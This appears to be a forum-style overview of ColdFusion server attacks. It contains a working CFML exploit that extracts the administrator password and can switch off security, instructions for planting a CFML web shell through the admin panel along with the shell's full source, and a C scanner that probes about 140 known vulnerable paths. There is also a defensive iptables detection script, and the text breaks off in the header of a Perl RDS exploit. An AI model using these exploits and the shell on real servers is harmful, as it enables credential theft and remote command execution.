Path disclosure
Request from a server running under IIS a file consisting of an MS-DOS device name (nul, prn, aux, lpt1) and the extension .dbm.
Example:

Access to debug information
Append ?mode=debug to the script.
Example:

Access to the admin panel
If the admin has not disabled access to ColdFusion Administrator from IP addresses other than 127.0.0.1, you can reach the login form; only a password needs to be entered.
Example:

Installation path disclosure in Macromedia ColdFusion MX
Request /CFIDE/probe.cfm on port 8500.
Example:

XSS in ColdFusion Fusebox
index.cfm?fuseaction=XSS
Example:

Administrator password disclosure
The vulnerability was found in ColdFusion MX. A remote authenticated user able to create ColdFusion templates can obtain the administrator password. A remote authenticated user with privileges to create templates that contain the CreateObject and cfobject tags can create a template that gains access to the administrator password.
Example:
Code:
<cfscript>
objFileWriter = CreateObject("java","java.io.FileWriter");
objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");
objJavaC = CreateObject("java","sun.tools.javac.Main");
objString = CreateObject("java","java.lang.String");
objFile = CreateObject("java","java.io.File");
if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }
strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";
strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";
strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";
strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";
fileWriter = objFileWriter.init("#strJavaSource#",false);
fileWriter.write("import coldfusion.security.SecurityManager;");
fileWriter.write("import java.io.File;");
fileWriter.write("public class SecurityExploit extends SecurityManager {");
fileWriter.write("public SecurityExploit(File arg0, File arg1) {");
fileWriter.write("super(arg0, arg1); }");
fileWriter.write("public boolean isAdminSecurityEnabled(){");
fileWriter.write("return false;}}");
fileWriter.flush();
fileWriter.close();
str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");
strArr = str.split(",");
byteArray = objByteArray.init();
compileObj = objJavaC.init(byteArray,str);
compileObj.compile(strArr);
obj = CreateObject("java","SecurityExploit");
file1 = objFile.init("#strNeoSecFile#");
file2 = objFile.init("#strPasswdFile#");
obj.init(file1,file2);
obj.load();
</cfscript>
<cfscript>
// Get Administrator Password
strAdminPw = obj.getAdminPassword();
// Set Administrator Password
//obj.setAdminPassword("test123");
// Turn off Sandbox Security
//obj.setSandboxSecurityEnabled(false);
// Turn off Administrator Login
//obj.setAdminSecurityEnabled(false);
// Turn off RDS Login
//obj.setRdsSecurityEnabled(false);
// Set RDS Password
//obj.setRdsPassword("test123");
// Turn off JVM Security
//obj.setJvmSecurityEnabled(false);
</cfscript>
<cfoutput>Administrator Password: #strAdminPw#</cfoutput>

Uploading a shell from the admin panel
I. If the server runs IIS, go to the Server -> Server Settings -> Settings tab and set Error Template to a link to the shell; then request a non-existent page on the server and the shell will run.
II. Go to the Server -> Automated Tasks -> Schedule Task tab, click Add Scheduled Task and enter a task name. The Operation field must be set to HTTPRequest. In the URL field enter the link to the shell, then under Publish tick Save output to a file. Specify the path and name of the output file on the server.
Shell:
Code:
<html>
<body>
<cfoutput>
<table>
<form method="POST" action="cfexec.cfm">
<tr>
<td>Command:</td>
<td><input type=text name="cmd" size=50 <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td>
</tr>
<tr>
<td>Options:</td>
<td><input type=text name="opts" size=50 <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td>
</tr>
<tr>
<td>Timeout:</td>
<td><input type=text name="timeout" size=4 <cfif isdefined("form.timeout")>value="#form.timeout#"<cfelse>value="5"</cfif>></td>
</tr>
</table>
<input type=submit value="Exec">
</form>
<cfsavecontent variable="myVar">
<cfexecute name="#Form.cmd#" arguments="#Form.opts#" timeout="#Form.timeout#"></cfexecute>
</cfsavecontent>
<pre>#myVar#</pre>
</cfoutput>
</body>
</html>

I'll be gradually adding vulnerabilities to this overview; fortunately there are plenty of them.
Local include
Macromedia ColdFusion ships with several small "helper" applications that are supposed to teach users how to work with ColdFusion. These applications are not installed by default, and Macromedia recommends not installing them on a production server. Some of them contain a vulnerability that allows an attacker to create files or execute commands on the vulnerable server.

Interesting places
Scanners:
Code:
/* CrAzY ScAn by Asmbeginer.com */
/* cc -o crazy crazy.c */
/* ./crazy 127.0.0.1 */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in sin;
    struct hostent *he;
    int count = 0;
    int ntcheck;
    char ntbuff[1024];
    char *buff[140];   /* request strings live in buff[1] .. buff[139] */

    buff[1] = "GET /cfdocs/zero.cfm HTTP/1.0\n\n";
    buff[2] = "GET /cfdocs/root.cfm HTTP/1.0\n\n";
    buff[3] = "GET /cfdocs/expressions.cfm HTTP/1.0\n\n";
    buff[4] = "GET /cfdocs/TOXIC.CFM HTTP/1.0\n\n";
    buff[5] = "GET /cfdocs/MOLE.CFM HTTP/1.0\n\n";
    buff[6] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n";
    buff[7] = "GET /cfdocs/expeval/sendmail.cfm HTTP/1.0\n\n";
    buff[8] = "GET /cfdocs/expeval/eval.cfm HTTP/1.0\n\n";
    buff[9] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
    buff[10] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n";
    buff[11] = "GET /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0\n\n";
    buff[12] = "GET /cfdocs/exampleapp/email/getfile.cfm?filename=c:\\boot.ini HTTP/1.0\n\n";
    buff[13] = "GET /cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.0\n\n";
    buff[14] = "GET /cfdocs/exampleapp/email/application.cfm HTTP/1.0\n\n";
    buff[15] = "GET /cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0\n\n";
    buff[16] = "GET /cfdocs/examples/parks/detail.cfm HTTP/1.0\n\n";
    buff[17] = "GET /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\n\n";
    buff[18] = "GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\n\n";
    buff[19] = "GET /cfdocs/snippets/viewexample.cfm HTTP/1.0\n\n";
    buff[20] = "GET /cfdocs/snippets/gettempdirectory.cfm HTTP/1.0\n\n";
    buff[21] = "GET /cfdocs/snippets/fileexists.cfm HTTP/1.0\n\n";
    buff[22] = "GET /cfdocs/snippets/evaluate.cfm HTTP/1.0\n\n";
    buff[23] = "GET /cfappman/index.cfm HTTP/1.0\n\n";
    buff[24] = "GET /cfusion/cfapps/forums/forums_.mdb HTTP/1.0\n\n";
    buff[25] = "GET /cfusion/cfapps/security/realm_.mdb HTTP/1.0\n\n";
    buff[26] = "GET /cfusion/cfapps/forums/data/forums.mdb HTTP/1.0\n\n";
    buff[27] = "GET /cfusion/cfapps/security/data/realm.mdb HTTP/1.0\n\n";
    buff[28] = "GET /cfusion/database/cfexamples.mdb HTTP/1.0\n\n";
    buff[29] = "GET /cfusion/database/cfsnippets.mdb HTTP/1.0\n\n";
    buff[30] = "GET /cfusion/database/smpolicy.mdb HTTP/1.0\n\n";
    buff[31] = "GET /cfusion/database/cypress.mdb HTTP/1.0\n\n";
    buff[32] = "GET /DataBase/ HTTP/1.0\n\n";
    buff[33] = "GET /database.nsf/e1466a8590/6048076233?OpenDocument HTTP/1.0\n\n";
    buff[34] = "GET /database.nsf/e146fa8590/6148076233?EditDocument HTTP/1.0\n\n";
    buff[35] = "GET /database.nsf/e146fa8590/6148076233?DeleteDocument HTTP/1.0\n\n";
    buff[36] = "GET /domcfg.nsf/?open HTTP/1.0\n\n";
    buff[37] = "GET /domcfg.nsf/URLRedirect/?OpenForm. HTTP/1.0\n\n";
    buff[38] = "GET /domcfg.nsf/ HTTP/1.0\n\n";
    buff[39] = "GET /domlog.nsf/ HTTP/1.0\n\n";
    buff[40] = "GET /log.nsf/ HTTP/1.0\n\n";
    buff[41] = "GET /catalog.nsf/ HTTP/1.0\n\n";
    buff[42] = "GET /names.nsf/ HTTP/1.0\n\n";
    buff[43] = "GET /database.nsf/ HTTP/1.0\n\n";
    buff[44] = "GET /today.nsf/ HTTP/1.0\n\n";
    buff[45] = "GET /cgi-bin/cgi-lib.pl HTTP/1.0\n\n";
    buff[46] = "GET /cgi-bin/imagemap.c HTTP/1.0\n\n";
    buff[47] = "GET /cgi-bin/imagemap.exe HTTP/1.0\n\n";
    buff[48] = "GET /cgi-bin/minimal.exe HTTP/1.0\n\n";
    buff[49] = "GET /cgi-bin/redir.exe HTTP/1.0\n\n";
    buff[50] = "GET /cgi-bin/stats.prg HTTP/1.0\n\n";
    buff[51] = "GET /cgi-bin/statsconfig HTTP/1.0\n\n";
    buff[52] = "GET /cgi-bin/visadmin.exe HTTP/1.0\n\n";
    buff[53] = "GET /cgi-bin/visitor.exe HTTP/1.0\n\n";
    buff[54] = "GET /cgi-bin/htmldocs HTTP/1.0\n\n";
    buff[55] = "GET /cgi-bin/logs HTTP/1.0\n\n";
    buff[56] = "GET /scripts/ HTTP/1.0\n\n";
    buff[57] = "GET /Default.asp HTTP/1.0\n\n";
    buff[58] = "GET /_vti_bin HTTP/1.0\n\n";
    buff[59] = "GET /_vti_bin/_vti_adm HTTP/1.0\n\n";
    buff[60] = "GET /_vti_bin/_vti_aut HTTP/1.0\n\n";
    buff[61] = "GET /srchadm HTTP/1.0\n\n";
    buff[62] = "GET /iisadmin HTTP/1.0\n\n";
    buff[63] = "GET /_AuthChangeUrl? HTTP/1.0\n\n";
    buff[64] = "GET /_vti_inf.html HTTP/1.0\n\n";
    buff[65] = "GET /?PageServices HTTP/1.0\n\n";
    buff[66] = "GET /html/?PageServices HTTP/1.0\n\n";
    buff[67] = "GET /scripts/cpshost.dll HTTP/1.0\n\n";
    buff[68] = "GET /scripts/uploadn.asp HTTP/1.0\n\n";
    buff[69] = "GET /scripts/uploadx.asp HTTP/1.0\n\n";
    buff[70] = "GET /scripts/upload.asp HTTP/1.0\n\n";
    buff[71] = "GET /scripts/repost.asp HTTP/1.0\n\n";
    buff[72] = "GET /scripts/postinfo.asp HTTP/1.0\n\n";
    buff[73] = "GET /scripts/run.exe HTTP/1.0\n\n";
    buff[74] = "GET /scripts/iisadmin/bdir.htr HTTP/1.0\n\n";
    buff[75] = "GET /scripts/iisadmin/samples/ctgestb.htx HTTP/1.0\n\n";
    buff[76] = "GET /scripts/iisadmin/samples/ctgestb.idc HTTP/1.0\n\n";
    buff[77] = "GET /scripts/iisadmin/samples/details.htx HTTP/1.0\n\n";
    buff[78] = "GET /scripts/iisadmin/samples/details.idc HTTP/1.0\n\n";
    buff[79] = "GET /scripts/iisadmin/samples/query.htx HTTP/1.0\n\n";
    buff[80] = "GET /scripts/iisadmin/samples/query.idc HTTP/1.0\n\n";
    buff[81] = "GET /scripts/iisadmin/samples/register.htx HTTP/1.0\n\n";
    buff[82] = "GET /scripts/iisadmin/samples/register.idc HTTP/1.0\n\n";
    buff[83] = "GET /scripts/iisadmin/samples/sample.htx HTTP/1.0\n\n";
    buff[84] = "GET /scripts/iisadmin/samples/sample.idc HTTP/1.0\n\n";
    buff[85] = "GET /scripts/iisadmin/samples/sample2.htx HTTP/1.0\n\n";
    buff[86] = "GET /scripts/iisadmin/samples/viewbook.htx HTTP/1.0\n\n";
    buff[87] = "GET /scripts/iisadmin/samples/viewbook.idc HTTP/1.0\n\n";
    buff[88] = "GET /scripts/iisadmin/tools/ct.htx HTTP/1.0\n\n";
    buff[89] = "GET /scripts/iisadmin/tools/ctss.idc HTTP/1.0\n\n";
    buff[90] = "GET /scripts/iisadmin/tools/dsnform.exe HTTP/1.0\n\n";
    buff[91] = "GET /scripts/iisadmin/tools/getdrvrs.exe HTTP/1.0\n\n";
    buff[92] = "GET /scripts/iisadmin/tools/mkilog.exe HTTP/1.0\n\n";
    buff[93] = "GET /scripts/iisadmin/tools/newdsn.exe HTTP/1.0\n\n";
    buff[94] = "GET /IISADMPWD/achg.htr HTTP/1.0\n\n";
    buff[95] = "GET /IISADMPWD/aexp.htr HTTP/1.0\n\n";
    buff[96] = "GET /IISADMPWD/aexp2.htr HTTP/1.0\n\n";
    buff[97] = "GET /IISADMPWD/aexp2b.htr HTTP/1.0\n\n";
    buff[98] = "GET /IISADMPWD/aexp3.htr HTTP/1.0\n\n";
    buff[99] = "GET /IISADMPWD/aexp4.htr HTTP/1.0\n\n";
    buff[100] = "GET /IISADMPWD/aexp4b.htr HTTP/1.0\n\n";
    buff[101] = "GET /IISADMPWD/anot.htr HTTP/1.0\n\n";
    buff[102] = "GET /IISADMPWD/anot3.htr HTTP/1.0\n\n";
    buff[103] = "GET /_vti_pvt/writeto.cnf HTTP/1.0\n\n";
    buff[104] = "GET /_vti_pvt/svcacl.cnf HTTP/1.0\n\n";
    buff[105] = "GET /_vti_pvt/services.cnf HTTP/1.0\n\n";
    buff[106] = "GET /_vti_pvt/service.stp HTTP/1.0\n\n";
    buff[107] = "GET /_vti_pvt/service.cnf HTTP/1.0\n\n";
    buff[108] = "GET /_vti_pvt/access.cnf HTTP/1.0\n\n";
    buff[109] = "GET /_private/registrations.txt HTTP/1.0\n\n";
    buff[110] = "GET /_private/registrations.htm HTTP/1.0\n\n";
    buff[111] = "GET /_private/register.txt HTTP/1.0\n\n";
    buff[112] = "GET /_private/register.htm HTTP/1.0\n\n";
    buff[113] = "GET /_private/orders.txt HTTP/1.0\n\n";
    buff[114] = "GET /_private/orders.htm HTTP/1.0\n\n";
    buff[115] = "GET /_private/form_results.htm HTTP/1.0\n\n";
    buff[116] = "GET /_private/form_results.txt HTTP/1.0\n\n";
    buff[117] = "GET /admisapi/fpadmin.htm HTTP/1.0\n\n";
    buff[118] = "GET /scripts/Fpadmcgi.exe HTTP/1.0\n\n";
    buff[119] = "GET /_vti_bin/shtml.dll HTTP/1.0\n\n";
    buff[120] = "GET /_vti_bin/_vti_aut/author.dll HTTP/1.0\n\n";
    buff[121] = "GET /_vti_bin/_vti_adm/admin.dll HTTP/1.0\n\n";
    buff[122] = "GET /msads/Samples/selector/showcode.asp HTTP/1.0\n\n";
    buff[123] = "GET /scripts/perl? HTTP/1.0\n\n";
    buff[124] = "GET /scripts/proxy/w3proxy.dll HTTP/1.0\n\n";
    buff[125] = "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n";
    buff[126] = "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n";
    buff[127] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
    buff[128] = "GET /AdvWorks/equipment/catalog_type.asp HTTP/1.0\n\n";
    buff[129] = "GET /scripts/iisadmin/default.htm HTTP/1.0\n\n";
    buff[130] = "GET /msadc/samples/adctest.asp HTTP/1.0\n\n";
    buff[131] = "GET /msadc/msadcs.dll HTTP/1.0\n\n";
    buff[132] = "GET /adsamples/config/site.csc HTTP/1.0\n\n";
    buff[133] = "GET /scripts/../../cmd.exe HTTP/1.0\n\n";
    buff[134] = "GET /scripts/cpshost.dll HTTP/1.0\n\n";
    buff[135] = "GET /scripts/convert.bas HTTP/1.0\n\n";
    buff[136] = "GET .html/...... HTTP/1.0\n\n";
    buff[137] = "GET /publisher/ HTTP/1.0\n\n";
    buff[138] = "GET ..../Windows/Admin.pwl HTTP/1.0\n\n";
    buff[139] = "GET ....../......ida/con HTTP/1.0\n\n";

    if (argc != 2) {
        printf("\nusage : %s host\n", argv[0]);
        exit(0);
    }
    if ((he = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(0);
    }

    /* one TCP connection per request (HTTP/1.0, server closes after each);
       the response is read into ntbuff and discarded */
    while (++count < 140) {
        sock = socket(AF_INET, SOCK_STREAM, 0);
        memset(&sin, 0, sizeof(sin));
        bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
            perror("connect");
        }
        for (ntcheck = 0; ntcheck < 1024; ntcheck++) {
            ntbuff[ntcheck] = '\0';
        }
        send(sock, buff[count], strlen(buff[count]), 0);
        recv(sock, ntbuff, sizeof(ntbuff), 0);
        close(sock);
    }
    return 0;
}
Code:
#!/bin/bash
#Copyright 2003 William Stearns <[email protected]>
#Released under the GPL.

#ZZZZ Check Me and MyVersion
Me='snort-web-coldfusion'
MyVersion='20031125'
#DefaultActions=''

[ -r /etc/firebricks/firebricks.conf ] && . /etc/firebricks/firebricks.conf
[ -r /etc/firebricks/$Me.conf ] && . /etc/firebricks/$Me.conf
[ -r ${FBLibDir:-'/usr/lib/firebricks/'}/firebrickslib ] && . ${FBLibDir:-'/usr/lib/firebricks/'}/firebrickslib
if [ -z "$FBLibVer" ]; then
    echo 'It looks like firebrickslib was not loaded, why? Exiting' >&2
    exit 1
fi

for OneTask in $Tasks ; do
    case "$OneTask" in
    link)
        $IptablesBin -N $Me >/dev/null 2>&1
        #ZZZZ try to restrict the following three to only send down what the chain needs to inspect.
        $IptablesBin $AppIn INPUT -i \! lo -j $Me
        $IptablesBin $AppIn FORWARD -j $Me
        $IptablesBin $AppIn OUTPUT -j $Me
        ;;
    unlink)
        #ZZZZ Make the same changes as above (such as "-p tcp"), but if you cut and paste, note "$AppIn" is now "-D"
        $IptablesBin -D INPUT -i \! lo -j $Me
        $IptablesBin -D FORWARD -j $Me
        $IptablesBin -D OUTPUT -j $Me
        $IptablesBin -X $Me >/dev/null 2>&1
        ;;
    create)
        echo "Starting $Me" >&2
        FlushOrNewChain $Me
        LogAs="SID903" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfcache.map"' $Tail # '"WEB-COLDFUSION cfcache.map access"' nocase-ignored bugtraq,917 cve,CVE-2000-0057 classtype:attempted-recon sid:903
        LogAs="SID904" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/email/application.cfm"' $Tail # '"WEB-COLDFUSION exampleapp application.cfm"' nocase-ignored bugtraq,1021 classtype:attempted-recon sid:904
        LogAs="SID905" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/publish/admin/application.cfm"' $Tail # '"WEB-COLDFUSION application.cfm access"' nocase-ignored bugtraq,1021 classtype:attempted-recon sid:905
        LogAs="SID906" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/email/getfile.cfm"' $Tail # '"WEB-COLDFUSION getfile.cfm access"' nocase-ignored bugtraq,229 classtype:attempted-recon sid:906
        LogAs="SID907" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/publish/admin/addcontent.cfm"' $Tail # '"WEB-COLDFUSION addcontent.cfm access"' nocase-ignored classtype:attempted-recon sid:907
        LogAs="SID908" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfide/administrator/index.cfm"' $Tail # '"WEB-COLDFUSION administrator access"' nocase-ignored cve,CVE-2000-0538 classtype:attempted-recon sid:908
        LogAs="SID909" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_SETDATASOURCEUSERNAME()"' $Tail # '"WEB-COLDFUSION datasource username attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:909
        LogAs="SID910" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/fileexists.cfm"' $Tail # '"WEB-COLDFUSION fileexists.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:910
        LogAs="SID911" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/exprcalc.cfm"' $Tail # '"WEB-COLDFUSION exprcalc access"' nocase-ignored cve,CVE-1999-0455 bugtraq,550 classtype:attempted-recon sid:911
        LogAs="SID912" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/parks/detail.cfm"' $Tail # '"WEB-COLDFUSION parks access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:912
        LogAs="SID913" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfappman/index.cfm"' $Tail # '"WEB-COLDFUSION cfappman access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:913
        LogAs="SID914" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/cvbeans/beaninfo.cfm"' $Tail # '"WEB-COLDFUSION beaninfo access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:914
        LogAs="SID915" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/evaluate.cfm"' $Tail # '"WEB-COLDFUSION evaluate.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:915
        LogAs="SID916" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_GETODBCDSN()"' $Tail # '"WEB-COLDFUSION getodbcdsn access"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:916
        LogAs="SID917" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_DBCONNECTIONS_FLUSH()"' $Tail # '"WEB-COLDFUSION db connections flush attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:917
        LogAs="SID918" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/"' $Tail # '"WEB-COLDFUSION expeval access"' nocase-ignored bugtraq,550 cve,CAN-1999-0477 classtype:attempted-user sid:918
        LogAs="SID919" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_SETDATASOURCEPASSWORD()"' $Tail # '"WEB-COLDFUSION datasource passwordattempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:919
        LogAs="SID920" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_ISCOLDFUSIONDATASOURCE()"' $Tail # '"WEB-COLDFUSION datasource attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:920
        LogAs="SID921" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_ENCRYPT()"' $Tail # '"WEB-COLDFUSION admin encrypt attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:921
        LogAs="SID922" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/displayopenedfile.cfm"' $Tail # '"WEB-COLDFUSION displayfile access"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:922
        LogAs="SID923" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_GETODBCINI()"' $Tail # '"WEB-COLDFUSION getodbcin attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:923
        LogAs="SID924" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_DECRYPT()"' $Tail # '"WEB-COLDFUSION admin decrypt attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:924
        LogAs="SID925" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/mainframeset.cfm"' $Tail # '"WEB-COLDFUSION mainframeset access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:925
        LogAs="SID926" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_SETODBCINI()"' $Tail # '"WEB-COLDFUSION set odbc ini attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:926
        LogAs="SID927" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_SETTINGS_REFRESH()"' $Tail # '"WEB-COLDFUSION settings refresh attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:927
        LogAs="SID928" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/"' $Tail # '"WEB-COLDFUSION exampleapp access"' nocase-ignored classtype:attempted-recon sid:928
        LogAs="SID929" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_VERIFYMAIL()"' $Tail # '"WEB-COLDFUSION CFUSION_VERIFYMAIL access"' nocase-ignored bugtraq,550 classtype:attempted-user sid:929
        LogAs="SID930" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/"' $Tail # '"WEB-COLDFUSION snippets attempt"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:930
        LogAs="SID931" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/cfmlsyntaxcheck.cfm"' $Tail # '"WEB-COLDFUSION cfmlsyntaxcheck.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:931
        LogAs="SID932" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/application.cfm"' $Tail # '"WEB-COLDFUSION application.cfm access"' nocase-ignored bugtraq,550 arachnids,268 cve,CAN-2000-0189 classtype:attempted-recon sid:932
        LogAs="SID933" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/onrequestend.cfm"' $Tail # '"WEB-COLDFUSION onrequestend.cfm access"' nocase-ignored bugtraq,550 arachnids,269 cve,CAN-2000-0189 classtype:attempted-recon sid:933
        LogAs="SID935" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfide/administrator/startstop.html"' $Tail # '"WEB-COLDFUSION startstop DOS access"' nocase-ignored bugtraq,247 classtype:web-application-attack sid:935
        LogAs="SID936" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/gettempdirectory.cfm"' $Tail # '"WEB-COLDFUSION gettempdirectory.cfm access "' nocase-ignored bugtraq,550 classtype:attempted-recon sid:936
        LogAs="SID1659" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/sendmail.cfm"' $Tail # '"WEB-COLDFUSION sendmail.cfm access"' nocase-ignored classtype:attempted-recon sid:1659
        LogAs="SID1540" $Ipt -A $Me -p tcp --dport 80 -m string --string '"Mode=debug"' $Tail # '"WEB-COLDFUSION ?Mode=debug attempt"' nocase-ignored classtype:web-application-activity sid:1540
        ;;
    destroy)
        echo "Stopping $Me" >&2
        DestroyChain $Me
        ;;
    renamechain)
        TempChain="$Me-$RANDOM"
        echo "Replacing existing rules in $Me with new rules" >&2
        $IptablesBin -E $Me $TempChain
        ;;
    replacelinks)
        if [ -z "$TempChain" ]; then
            echo "No temporary chain to relink in $Me replacelinks, replace operation incomplete." >&2
        elif ! $IptablesBin -L $Me -n >/dev/null 2>&1 ; then
            echo "No $Me chain in $Me, replace operation incomplete." >&2
        elif ! $IptablesBin -L $TempChain -n >/dev/null 2>&1 ; then
            echo "No $TempChain chain in $Me, replace operation incomplete." >&2
        elif [ "`$IptablesBin -L INPUT -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then
            echo "Too few/many references to $TempChain in INPUT in $Me replacelinks, replace operation incomplete." >&2
        elif [ "`$IptablesBin -L FORWARD -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then
            echo "Too few/many references to $TempChain in FORWARD in $Me replacelinks, replace operation incomplete." >&2
        elif [ "`$IptablesBin -L OUTPUT -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then
            echo "Too few/many references to $TempChain in OUTPUT in $Me replacelinks, replace operation incomplete." >&2
        else
            #ZZZZ Place the same criteria you used in link/unlink above in the following three lines.
            #ZZZZ Criteria should go just in front of "-j $Me"
            $IptablesBin -R INPUT `$IptablesBin -L INPUT -n --line-numbers | grep $TempChain | awk '{print $1}'` -i \! lo -j $Me
            $IptablesBin -R FORWARD `$IptablesBin -L FORWARD -n --line-numbers | grep $TempChain | awk '{print $1}'` -j $Me
            $IptablesBin -R OUTPUT `$IptablesBin -L OUTPUT -n --line-numbers | grep $TempChain | awk '{print $1}'` -j $Me
            DestroyChain $TempChain
            unset TempChain
        fi
        ;;
    status)
        if $IptablesBin -L $Me -n >/dev/null 2>&1 ; then
            echo "$Me created" >&2
        else
            echo "$Me destroyed" >&2
        fi
        ;;
    version)
        echo "$Me $MyVersion, firebrickslib $FBLibVer" >&2
        ;;
    help)
        DefaultHelp
        #ZZZZ Please change the text to appropriate help text for this module. You should
        #ZZZZ cover what the module does, if it's generally safe to use, and under what
        #ZZZZ conditions it should not be used. Please replace the lines between the two
        #ZZZZ EOTEXT lines with your own.
        cat <<EOTEXT >&2
The $Me module puts in some blocks for fragmented icmp packets (illegal) and
address mask and timestamp requests and replies. At best, these are uncommon
and are used in network mapping. These rules should be safe to use on any network.
EOTEXT
        ;;
    *)
        echo "Unknown action $Action in $Me, no action taken." >&2
        ;;
    esac
done
XSS in ColdFusion 5.0
The ColdFusion administrator can view the application log through a web browser. The vulnerability allows an attacker to write arbitrary JavaScript code into the application log, which is executed when the administrator views the log.
Here is part of the vulnerable code:
If the INT function encounters a non-numeric value, it raises an error and writes the value to the application log. If url.productid contains something like this:
then when the application log is viewed, the attacker can steal the administrator's cookies, which store the password in encrypted form.

Buffer overflow in Macromedia ColdFusion jrun.dll leading to an IIS DoS
A buffer overflow was found in ColdFusion MX server when it is used together with Microsoft IIS. On receiving an HTTP header exceeding 4096 bytes, and if the template filename is larger than 8092 bytes, an overflow occurs in the 'jrun.dll' module. Successful exploitation of the bug can lead to IIS hanging and possibly to arbitrary code execution.

ColdFusion MX Remote Development Service Exploit
Code:
#!/usr/bin/perl
# RDS_c_Dump.pl
# By angry packet
##
# THIS IS AN UNPATCHED VULNERABILITY - THIS IS AN UNPATCHED VULNERABILITY
#
# ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is an "almost" complete emulation of a dreamweaver client connection,
# in like one full HTTP/1.1 session within netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
#
# Due to certain current situations I am not allowed to release full exploit code with
# ( READ, RETRIEVE, WRITE ) functions.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
